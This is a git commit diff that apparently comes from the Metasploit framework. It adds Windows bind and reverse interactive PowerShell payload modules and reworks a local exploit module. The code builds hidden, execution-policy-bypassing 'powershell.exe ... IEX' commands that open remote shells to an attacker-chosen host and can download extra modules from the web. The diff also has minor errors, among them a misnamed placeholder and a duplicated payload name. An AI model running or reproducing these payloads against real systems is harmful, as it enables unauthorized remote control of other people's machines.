New payloads
parent
a02ea90824
commit
ded904c72c
|
@ -1,4 +1,4 @@
|
|||
1##
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
@ -7,8 +7,6 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
|
||||
include Rex::Powershell::Command
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => "Windows Local Interactive Powershell Session",
|
||||
|
@ -47,61 +45,37 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::LPORT(4444),
|
||||
OptString.new('LOAD_MODULES', [false, 'A list of powershell modules seperated by a comma to download over the Internet', nil])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
rhost = datastore['RHOST']
|
||||
lhost = datastore['LHOST']
|
||||
lport = datastore['LPORT']
|
||||
payload = datastore['PAYLOAD']
|
||||
|
||||
if datastore['RHOST'].to_s.empty?
|
||||
rhost = session.session_host
|
||||
else
|
||||
rhost = datastore['RHOST']
|
||||
# sysinfo is only on meterpreter sessions
|
||||
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||
|
||||
# Check that the payload is a Windows one and on the list
|
||||
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
|
||||
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
|
||||
return
|
||||
end
|
||||
|
||||
template_path = File.join(
|
||||
Msf::Config.data_directory,
|
||||
'exploits',
|
||||
'powershell',
|
||||
'powerfun.ps1')
|
||||
|
||||
script_in = File.read(template_path)
|
||||
|
||||
if datastore['LHOST'].to_s.empty?
|
||||
script_in << "\npowerfun -Command bind"
|
||||
else
|
||||
lhost = datastore['LHOST']
|
||||
script_in << "\npowerfun -Command reverse"
|
||||
end
|
||||
|
||||
mods = ''
|
||||
|
||||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
end
|
||||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORT_REPLACE', lport.to_s)
|
||||
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
|
||||
res = session.sys.process.execute("powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})", nil, 'Hidden' => true, 'Channelized' => false)
|
||||
pay = client.framework.payloads.create(payload)
|
||||
pay.datastore['LHOST'] = lhost
|
||||
pay.datastore['LPORT'] = lport
|
||||
pay.datastore['RHOST'] = rhost
|
||||
|
||||
raw = pay.generate
|
||||
res = session.sys.process.execute("#{raw}", nil, 'Hidden' => true, 'Channelized' => false)
|
||||
fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
|
||||
computer_name = session.sys.config.sysinfo['Computer']
|
||||
vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
|
||||
|
||||
if datastore['LHOST'].to_s.empty?
|
||||
print_status("Attemping to connect to #{rhost}:#{lport}...")
|
||||
ctimeout = 30
|
||||
ctimeout = 10
|
||||
stime = Time.now.to_i
|
||||
last_error = nil
|
||||
|
||||
|
|
|
@ -4,23 +4,28 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/find_shell'
|
||||
require 'msf/base/sessions/powershell'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 0
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
include Rex::Powershell::Command
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Bind Powershell, Interact with Established Connection',
|
||||
'Description' => 'Interacts with a powershell session on an established socket connection',
|
||||
'Author' => 'hdm',
|
||||
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
|
||||
'Description' => 'Listen for a connection and spawn an interactive powershell session',
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Turner', # benpturner
|
||||
'Dave Hardy' # davehardy20
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'windows',
|
||||
'Arch' => ARCH_CMD,
|
||||
|
@ -34,6 +39,40 @@ module Metasploit3
|
|||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def generate
|
||||
lport = datastore['LPORT']
|
||||
|
||||
template_path = File.join(
|
||||
Msf::Config.data_directory,
|
||||
'exploits',
|
||||
'powershell',
|
||||
'powerfun.ps1')
|
||||
|
||||
script_in = File.read(template_path)
|
||||
script_in << "\npowerfun -Command bind"
|
||||
|
||||
mods = ''
|
||||
|
||||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
end
|
||||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORTs_REPLACE', lport.to_s)
|
||||
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -4,23 +4,28 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/find_shell'
|
||||
require 'msf/base/sessions/powershell'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 0
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
include Rex::Powershell::Command
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Reverse Powershell, Interact with Established Connection',
|
||||
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
|
||||
'Description' => 'Interacts with a powershell session on an established socket connection',
|
||||
'Author' => 'hdm',
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Turner', # benpturner
|
||||
'Dave Hardy' # davehardy20
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'windows',
|
||||
'Arch' => ARCH_CMD,
|
||||
|
@ -34,6 +39,42 @@ module Metasploit3
|
|||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def generate
|
||||
lport = datastore['LPORT']
|
||||
lhost = datastore['LHOST']
|
||||
|
||||
template_path = File.join(
|
||||
Msf::Config.data_directory,
|
||||
'exploits',
|
||||
'powershell',
|
||||
'powerfun.ps1')
|
||||
|
||||
script_in = File.read(template_path)
|
||||
script_in << "\npowerfun -Command reverse"
|
||||
|
||||
mods = ''
|
||||
|
||||
if datastore['LOAD_MODULES']
|
||||
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
|
||||
mods_array.collect(&:strip)
|
||||
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
|
||||
mods_array.each {|m| vprint_good " #{m}"}
|
||||
mods = "\"#{mods_array.join("\",\n\"")}\""
|
||||
script_in << " -Download true\n"
|
||||
end
|
||||
|
||||
script_in.gsub!('MODULES_REPLACE', mods)
|
||||
script_in.gsub!('LPORT_REPLACE', lport.to_s)
|
||||
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
|
||||
|
||||
script = Rex::Powershell::Command.compress_script(script_in)
|
||||
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue